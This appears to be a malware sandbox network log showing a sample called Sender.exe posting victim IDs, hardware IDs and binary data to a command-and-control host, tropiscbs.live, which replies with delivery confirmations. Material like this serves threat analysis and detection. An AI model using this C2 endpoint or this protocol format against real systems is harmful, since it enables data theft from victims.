                                                                      0192.168.2.449710104.21.77.2034434768C:\Users\user\Desktop\Sender.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-04-27 16:36:32 UTC264OUTPOST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 41
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:32 UTC41OUTData Raw: 75 69 64 3d 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 26 63 69 64 3d
                                                                      Data Ascii: uid=12d898740c114649201bf2f1f17f96f0&cid=
                                                                      2025-04-27 16:36:33 UTC244INHTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:33 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 33581
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd4a595a52fb-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:33 UTC1125INData Raw: b1 2f 01 89 81 9b a4 d9 61 d9 36 c3 7a 6b 88 0b 32 45 b8 c8 06 2d 25 14 27 2c e4 86 af a5 ec 50 6a 17 82 f8 6b cf 03 10 8f 49 25 8f e3 49 12 95 93 27 88 02 94 e6 42 23 8b 86 e0 9f 98 64 b9 c9 e2 02 e0 a9 a1 ee 29 42 21 4e a6 e1 83 f9 d7 dc ac 1b a8 44 9f 1f 98 61 bf 17 5c e2 6b c6 d8 79 a6 3b d1 10 14 d7 54 a7 0a ed 91 2f 4c 91 49 64 e9 06 c2 f4 55 9a 58 2f 34 79 81 f8 18 71 9d c4 82 fb b2 d7 4d fc 80 27 55 b2 d5 a7 bb 3a 35 42 7f 87 f8 b3 06 6c cb af cc ed 84 f0 7c 80 c0 ef 8e 86 01 e6 03 16 34 f1 ea dc 83 cc 50 d7 af 60 63 6c d2 23 28 6b 23 42 e6 a2 05 8f f0 f3 99 48 e9 f9 d7 4f 18 4a d0 44 39 be f6 a2 f1 00 25 1c f9 c8 90 88 c3 49 20 75 cd 49 df 99 45 d0 27 63 92 0a 77 bd 09 89 b0 9e bd 1e 54 5c 72 69 a1 65 41 ab 4a 53 28 fe c1 ce 6a f5 56 7c 03 ae 64
                                                                      Data Ascii: /a6zk2E-%',PjkI%I'B#d)B!NDa\ky;T/LIdUX/4yqM'U:5Bl|4P`cl#(k#BHOJD9%I uIE'cwT\rieAJS(jV|d
                                                                      2025-04-27 16:36:33 UTC1369INData Raw: 6a 92 35 f4 d9 c6 cd d3 02 2d d6 59 c9 5c 8e 0d ca 41 c3 09 69 de d5 b3 ec 96 a0 f9 8c c7 f3 c8 75 79 7e 1c 8e 98 6e f2 3f 1a ac 26 b3 27 e9 a8 17 43 f3 8b 92 2f 73 98 5b 71 93 4d 5a 22 d5 b4 67 9c eb f9 0f b0 96 78 5a ce 21 15 f6 f7 58 b6 fa 9d 9d ca 69 26 d9 23 e6 81 0b 98 4a d9 85 f4 07 d0 a8 52 70 8c b8 7a c9 a6 e7 c8 59 80 82 91 d1 dc 7a 4c da 01 15 1b 28 d0 e8 0e 85 af f6 e9 1f fc 2d b8 00 5c ee 51 53 15 01 63 5d b7 ab 34 c6 43 fc 74 1a f6 37 90 39 ee bb d0 fb df e2 2b 59 02 7a e6 5e 53 60 02 68 eb a6 90 07 20 fe 46 0c f7 d6 0f ec 74 06 79 22 65 1c 3d 15 88 ae ae 20 09 3b 27 dd d0 37 3d d9 dd 2c 23 6b 5c 5d 1a 9c db 82 58 be 5a da a2 2e 62 13 f3 72 7f 11 21 d1 90 ef 1d 92 db 48 53 f5 36 11 c0 a5 f0 20 bb 97 d5 77 f3 01 d5 b3 9e 55 da a9 46 a0 15 6f
                                                                      Data Ascii: j5-Y\Aiuy~n?&'C/s[qMZ"gxZ!Xi&#JRpzYzL(-\QSc]4Ct79+Yz^S`h Fty"e= ;'7=,#k\]XZ.br!HS6 wUFo
                                                                      2025-04-27 16:36:33 UTC1369INData Raw: cb 17 fc 5e 13 a5 9d 60 ee 93 6d 91 70 36 2f f5 63 b7 bf 08 bc ef 4d 1d e2 2c 6a 71 c3 4b 2f 30 6e b8 d1 87 84 71 2a 81 e3 bb 99 f1 81 79 05 d6 d2 0b f3 a2 f0 be 9c ee 2f 15 07 3d fe cf 7e bf 98 f4 aa d9 f5 95 d7 3d d4 12 1a 09 69 fa fe 9e cd f8 ec 48 ef 71 f9 63 13 55 ba 4f 18 c1 39 fd d9 cc 36 a0 b3 74 73 1f 21 5f 30 b0 16 6c 8c e4 b4 bc 2a 77 d1 e5 65 46 e5 e2 e6 19 99 ed 50 05 a8 4f e9 59 73 6f 5b dc da 4f 70 f4 95 48 73 9a 34 b1 d6 37 1d fb 0e 12 4e 9c fe c6 fc b0 eb 18 02 15 a3 f3 1e 91 dd 38 95 1d 8c 7e 1a 4c 54 fa b6 ac d3 e5 5a 3d 50 98 b9 a3 fa 6e c2 f3 1b 67 29 3a 00 2d 76 43 7a 0d 7c 0b a8 b9 c6 6f eb 6b b6 36 1a 97 84 7b 87 a4 eb e4 22 c5 cb 6e e3 e6 72 6d 48 2f cb 0f 76 3f 9f f5 c3 ff 67 e5 01 61 5b 82 09 c5 fd e2 ad 9d 78 a5 32 ff f9 22 db
                                                                      Data Ascii: ^`mp6/cM,jqK/0nq*y/=~=iHqcUO96ts!_0l*weFPOYso[OpHs47N8~LTZ=Png):-vCz|ok6{"nrmH/v?ga[x2"
                                                                      2025-04-27 16:36:33 UTC1369INData Raw: 75 af 03 e6 e4 da 18 02 c3 54 09 e4 f6 ab ea 1a 40 f2 89 16 9d d2 ff 0b 42 c7 e6 44 cf ae 6a 38 d5 37 08 74 e9 95 a1 ab 33 13 08 e4 8e 41 85 af e5 40 bc b9 3e 7c 72 e9 bd ba 16 4f 85 04 a6 7c 5a 60 71 52 02 c4 65 a5 e9 43 3b 05 fd ff 7c 41 38 ac 84 67 24 90 ae 46 43 3e fe 9d f9 5e 23 80 e6 6a 01 61 5d 0f 0e b9 87 c4 da 10 e6 1a 14 29 69 62 54 79 16 4c 20 9d c4 62 08 7f b1 73 9e 3f c4 c1 74 46 b5 30 b9 d1 09 07 05 e4 18 b0 e6 5a 50 02 1a 13 5e a5 8e 79 80 d6 fb 22 e7 ea de 1b 21 6f e1 8b 33 d9 e1 76 65 f7 09 bf cf 7a 99 c2 78 c3 cd 37 32 9d 48 9d a8 1d 81 b9 ce e9 7e cc 21 d3 e5 1d 27 b2 50 27 76 de 80 ed 47 2e 65 bf fc 5f df 4b 01 99 f6 98 cb da ae 0a 35 b8 1c ef b9 83 5d 2f ea 64 42 b8 78 7b 95 92 62 bc 29 9c f8 fb 27 70 7a 8f ce 42 c8 8f ce 57 18 a5 30
                                                                      Data Ascii: uT@BDj87t3A@>|rO|Z`qReC;|A8g$FC>^#ja])ibTyL bs?tF0ZP^y"!o3vezx72H~!'P'vG.e_K5]/dBx{b)'pzBW0
                                                                      2025-04-27 16:36:33 UTC1369INData Raw: 92 0e 16 c1 4d d8 d9 16 84 5c 45 dd 3a b3 bb 6d 92 d3 4b 0b 2f 35 59 5e 04 71 e1 b8 bf 25 6e 1a cc 70 0e da 6e 78 08 82 f5 56 58 90 8f 8a d4 7e cd ac 83 27 36 c3 2e 8a 55 aa d7 46 4d 00 56 68 5b 51 72 62 40 50 41 13 f7 56 55 cc ab 08 d3 4e 61 80 4c f5 25 0a da 55 19 b7 5e 5e 8d 67 0f 6a cd 0d 3c dc f9 50 2b 36 d6 85 27 df 85 10 f9 93 36 4f 72 a1 be 44 dc de 03 e6 3e 7c 9c fb 1f 1d 64 b4 78 93 b3 95 c4 2f 71 f7 73 15 ad de de cf da f5 b7 87 6c 15 88 b8 7a 17 c4 da 46 9e ca 85 b1 4b 1d 7c 73 11 bf a0 77 45 d2 1f 72 bd 82 28 64 c2 eb 8c 9e cd 89 6e 90 06 3e e4 b8 a1 a1 f3 28 47 91 3c 7d 33 97 63 d3 c7 6c 88 fd f9 d8 b8 25 d7 7b 02 fc de 60 fc 2a 54 a3 3e 67 a8 d8 df 0b 62 ee 14 ab 28 de b7 78 4b 6b be 93 d0 52 12 27 d1 ea ac e4 18 00 1f 47 29 82 70 4b 96 56
                                                                      Data Ascii: M\E:mK/5Y^q%npnxVX~'6.UFMVh[Qrb@PAVUNaL%U^^gj<P+6'6OrD>|dx/qslzFK|swEr(dn>(G<}3cl%{`*T>gb(xKkR'G)pKV
                                                                      2025-04-27 16:36:33 UTC1369INData Raw: 62 60 1b 8d fd a3 bf 95 3d a0 e6 00 83 d2 cc e3 83 76 a9 46 64 1f 3c 46 3a 65 e3 bf 5b 50 fa 62 94 8e 39 db c6 76 bf 30 ec ff e4 70 dc e6 af e2 02 cc 5b fa fe 05 a4 e5 b1 15 e0 8f 50 13 78 13 05 3e 93 4a 1c 9c 87 5e 80 a0 6e 69 86 21 fd 4f f7 dd 0d 58 32 a3 a5 e6 44 7f 5b 06 63 46 7d 11 b3 01 ff c5 db 3a 0d 1a 82 ea e7 15 87 16 51 c9 eb 18 72 3d 33 50 36 21 66 3d c9 18 33 ba f1 65 e5 72 3b b5 30 50 c4 38 13 38 ee 2c 8f d0 92 97 67 d8 97 57 16 15 5b a4 12 f3 73 ef f5 7b e1 3c 5c 82 5f 7b 15 0b 42 3d 1a f9 c5 ab 48 d1 68 65 30 49 d8 59 83 3e c3 53 c3 2c 26 e1 12 66 47 ec 7a f1 ec 29 41 ef 33 4e 53 03 e0 7b af e4 be a8 3f 34 0a b0 26 b8 80 4d 84 b5 6f de e6 1e 8c 7a a7 0c 16 e6 0c 06 e3 27 32 ff 3e a6 2d 19 9a f8 62 8a 80 42 7d ef f2 4e c1 90 c0 22 18 0e 50
                                                                      Data Ascii: b`=vFd<F:e[Pb9v0p[Px>J^ni!OX2D[cF}:Qr=3P6!f=3er;0P88,gW[s{<\_{B=Hhe0IY>S,&fGz)A3NS{?4&Moz'2>-bB}N"P
                                                                      2025-04-27 16:36:33 UTC222INData Raw: 6c 6b e6 9a c2 38 73 df 9c 9f 42 8d 32 9d e4 0c 67 41 1b b5 2d 05 d2 55 61 1b 59 29 cc 57 66 b1 18 c5 90 93 fe 3f 20 dc d5 57 48 00 bc e3 77 32 b4 20 17 10 c6 9b 60 da 94 5b ff 6c af f3 eb 83 64 4b 1e 4c 48 0e ac df 63 fd 6b 7d 2a 78 ce 19 e9 ad 2c 58 29 fa 81 0d 4e 51 3e 7b 76 5d ab aa a9 8f 0c 7e 42 ad a6 b3 9a 9b 6b 2d 1a 92 cb 46 c0 ba 28 ad ad 73 b0 9b 4c 61 aa 36 af aa e9 c6 dc 96 dd dd 48 e0 a9 fc ef 51 b2 a1 17 dc 36 2d a8 04 06 6b 79 a1 24 92 91 2e b8 f4 05 5f 35 1e 07 58 4d 20 a0 4a 71 5b bf 95 c5 9a c5 49 bc a2 99 ec 25 a7 bd a0 47 2e 4f f0 82 12 a4 0d 92 e6 2c 0d 40 a1 c7 e9 53 20 b5 c1 1a 9f 28 36 b4 fc 96 14 eb 86 c2 e0 77 25 eb e5 f5 c3 95 8b
                                                                      Data Ascii: lk8sB2gA-UaY)Wf? WHw2 `[ldKLHck}*x,X)NQ>{v]~Bk-F(sLa6HQ6-ky$._5XM Jq[I%G.O,@S (6w%
                                                                      2025-04-27 16:36:33 UTC1369INData Raw: b0 b0 20 67 c9 41 da ad 1f ed 61 4f 07 f0 7b 37 63 3f d5 59 59 0d 98 a7 51 09 14 ce 42 f1 6b e8 3f e8 0e d1 8b 67 bd b8 94 66 95 ae 74 6e 77 89 da 73 1f cd 8c 2b 05 ab 15 df 41 cb a1 d4 f5 96 e0 9e fc 75 d5 5d de d5 08 38 23 8e f5 af fc cc a2 bf 7d 7c c9 75 b7 b6 ce 94 69 94 44 ff 1c 77 66 46 d7 70 d0 84 72 3f b7 36 41 67 03 87 6b 32 af e0 47 f4 9c ae 2a 63 ec c4 65 5e 6c c5 3d 22 67 da e3 43 bb 14 fe a0 26 af 46 82 39 b6 06 29 b8 10 49 8f b5 b5 98 2f 55 7d fd 17 9c 5d 5a 40 5f 27 4b 2d 9e ec 56 3b 8b 56 6c 3e 69 2e eb 01 32 21 49 f2 5b 72 c9 bb c6 f3 e2 e6 84 ba 35 e7 81 21 d2 f8 ba 6b 96 e1 0e 33 b8 20 ad 36 75 b9 89 1e 80 92 15 b2 85 36 09 f1 0d 77 23 c8 39 9c 51 1f 09 f3 6d 22 2e 70 b7 d3 e3 07 90 d1 55 12 d2 5b 82 25 db c3 d1 c1 fd 88 8d e5 a1 6a 67
                                                                      Data Ascii: gAaO{7c?YYQBk?gftnws+Au]8#}|uiDwfFpr?6Agk2G*ce^l="gC&F9)I/U}]Z@_'K-V;Vl>i.2!I[r5!k3 6u6w#9Qm".pU[%jg
                                                                      2025-04-27 16:36:33 UTC1369INData Raw: 0e a4 d9 a8 a4 11 59 6f e7 21 04 09 cb 5b de 94 3b 4f f6 07 b2 3c aa 03 e8 65 f6 ef 78 f4 ee 30 bb 2e 49 e9 bf 5a 81 9d 6a b2 e3 2c af 96 c2 c5 05 b9 1b 89 53 ed 89 ab cf 1d 9a a3 e9 80 2e 5f ad 6c aa b6 2e 10 75 62 55 f8 2c 73 12 2b d1 c4 00 fa 2a ae 21 ef cb c6 95 8b 82 e5 04 dc a6 4d 30 10 92 b4 50 e9 f2 f6 da ba 59 3c ec 4c ac ab 96 cb 1e d5 1e 7b bb 95 58 5b 2a d0 a8 13 e6 c7 de 08 66 e4 8d 15 ed 25 58 03 09 03 46 88 c7 b6 8a 16 7e 3a c5 4c 51 e2 01 f2 c6 3f 90 09 0b c6 e8 a4 ce 5d ee ef 60 25 a0 38 a0 f5 f6 4d 1c f7 ea 0b bb f6 99 4e f6 85 b1 46 93 60 97 7a 4f e0 0d c4 07 42 49 da c3 2b 78 98 a6 82 21 68 4d f7 e3 cb d0 36 fa f7 c6 44 7b 99 0b 6e fa b6 0b 57 5c 37 dd c6 6f 49 7b 4a d6 bc 86 1d 27 0c 88 28 d2 37 5f a1 49 99 1e 51 73 f1 e8 fe d0 90 48
                                                                      Data Ascii: Yo![;O<ex0.IZj,S._l.ubU,s+*!M0PY<L{X[*f%XF~:LQ?]`%8MNF`zOBI+x!hM6D{nW\7oI{J'(7_IQsH


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449711104.21.77.2034434768C:\Users\user\Desktop\Sender.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-04-27 16:36:34 UTC273OUTPOST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=b9KQrht4n
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 19566
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:34 UTC15331OUTData Raw: 2d 2d 62 39 4b 51 72 68 74 34 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 62 39 4b 51 72 68 74 34 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 39 4b 51 72 68 74 34 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37 0d 0a 2d 2d 62 39 4b 51
                                                                      Data Ascii: --b9KQrht4nContent-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--b9KQrht4nContent-Disposition: form-data; name="pid"2--b9KQrht4nContent-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F7--b9KQ
                                                                      2025-04-27 16:36:34 UTC4235OUTData Raw: 80 ee be cb 60 57 19 43 4f c5 be 49 0e bf b4 6e ed 0b 52 a7 1c 11 ad 62 3e 87 ed 8e fa a9 f3 7a 84 95 19 b3 9d f0 75 86 c5 3f c0 94 99 39 16 24 b3 9b 9f 5c ec 0b c6 9b f2 70 0f ea 7b 63 cd 0d cb 84 58 ab f8 2e 6d 99 d6 e1 38 18 6a a4 53 d6 df ac d5 52 bc ca a9 57 05 17 28 49 b7 33 aa 04 93 26 a2 04 d3 0a cd 08 7c d8 52 c6 12 bd 88 3c aa 17 b7 e7 01 62 be 5f 89 2b 1b b3 ee ea 5d ff 74 da ef 62 8b 03 28 88 c9 1f 1b 9f c3 af 3e 69 36 ef 48 1b c4 12 97 27 0a f0 9a b4 a2 5c 58 f4 b6 32 ee 38 4c 14 34 b5 cf 7d ed 08 99 f1 93 86 73 13 99 0b 81 b5 ae 40 34 0e 36 6b e8 50 a6 6c be f4 4a 37 5f 24 cd 7a 5c 8f 6a f1 fb d1 69 6d 31 f1 8e c4 1a 0b 4e fe 68 8e d6 ca 04 8e 49 3e 2c 20 2d 5e 6e ab bc 4f 10 41 4a 30 d8 80 64 11 29 a1 21 ac a3 59 2c 63 b9 60 0b 0e bc 5c e5
                                                                      Data Ascii: `WCOInRb>zu?9$\p{cX.m8jSRW(I3&|R<b_+]tb(>i6H'\X28L4}s@46kPlJ7_$z\jim1NhI>, -^nOAJ0d)!Y,c`\
                                                                      2025-04-27 16:36:35 UTC264INHTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:35 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd562b625269-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:35 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449712104.21.77.2034434768C:\Users\user\Desktop\Sender.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-04-27 16:36:36 UTC277OUTPOST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=Gnf88AvpKC995A
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 8748
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:36 UTC8748OUTData Raw: 2d 2d 47 6e 66 38 38 41 76 70 4b 43 39 39 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 47 6e 66 38 38 41 76 70 4b 43 39 39 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 6e 66 38 38 41 76 70 4b 43 39 39 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33
                                                                      Data Ascii: --Gnf88AvpKC995AContent-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--Gnf88AvpKC995AContent-Disposition: form-data; name="pid"2--Gnf88AvpKC995AContent-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3
                                                                      2025-04-27 16:36:37 UTC264INHTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:37 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd5f18f01504-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:37 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449715104.21.77.2034434768C:\Users\user\Desktop\Sender.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-04-27 16:36:37 UTC275OUTPOST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=CCvd1Ar39E9
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 20386
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:37 UTC15331OUTData Raw: 2d 2d 43 43 76 64 31 41 72 33 39 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 43 43 76 64 31 41 72 33 39 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 43 76 64 31 41 72 33 39 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37 0d 0a
                                                                      Data Ascii: --CCvd1Ar39E9Content-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--CCvd1Ar39E9Content-Disposition: form-data; name="pid"3--CCvd1Ar39E9Content-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F7
                                                                      2025-04-27 16:36:37 UTC5055OUTData Raw: 0c 85 34 51 94 2d 76 e0 12 a5 5d a4 cb 16 ca 43 07 14 c8 46 21 c2 04 73 cf 35 73 7b 3f 2f 4b 8e 41 59 00 0c 33 b4 af 42 96 c1 b6 48 17 97 51 35 4b 15 c5 95 f9 d5 77 e7 c9 ec 5e 04 f2 aa 05 f8 7f fd 14 d2 58 aa 96 77 08 e1 eb 68 6e d8 ba 50 c7 46 fb 31 fe 3d 6c 3b 70 cb 4d 9e c5 8e 8e 69 b6 10 02 3b 4b ea e5 f7 1f e9 a3 03 55 23 c7 79 47 be 5a db 31 a0 55 d7 40 0a 28 61 a6 8e 2b 79 4c fc e8 38 79 9d e8 06 27 16 7a 75 e2 6c f2 54 e3 6f e9 3e b9 00 cf 4b 28 fb 4d 71 f1 4c 07 69 89 d7 cd 6f 7c bf 44 08 f0 67 f7 6b 3c d7 66 fb 00 19 c0 e0 b2 b6 b1 29 11 f7 96 e5 9d 2c bb ff 5f f2 5f 7d dd 97 79 e8 7a 3c d1 1c 6f fa 08 14 10 b4 25 6a 45 3a 01 ad 25 26 17 cd b9 86 ef f0 e3 c4 cd bd 33 0a 82 f0 1a 5b d8 75 3b 04 8c 50 cf d1 45 3b 86 2e 91 f6 dc 81 07 ca af 2b f7
                                                                      Data Ascii: 4Q-v]CF!s5s{?/KAY3BHQ5Kw^XwhnPF1=l;pMi;KU#yGZ1U@(a+yL8y'zulTo>K(MqLio|Dgk<f),__}yz<o%jE:%&3[u;PE;.+
                                                                      2025-04-27 16:36:38 UTC264INHTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:38 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd680efbf0e2-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:38 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449717104.21.77.2034434768C:\Users\user\Desktop\Sender.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-04-27 16:36:40 UTC273OUTPOST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=3Q5bUbGM7Q
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 2221
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:40 UTC2221OUTData Raw: 2d 2d 33 51 35 62 55 62 47 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 33 51 35 62 55 62 47 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 51 35 62 55 62 47 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37 0d 0a 2d 2d 33
                                                                      Data Ascii: --3Q5bUbGM7QContent-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--3Q5bUbGM7QContent-Disposition: form-data; name="pid"1--3Q5bUbGM7QContent-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F7--3
                                                                      2025-04-27 16:36:40 UTC264INHTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:40 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd76ec00150c-LAX
                                                                      alt-svc: h3=":443"; ma=86400
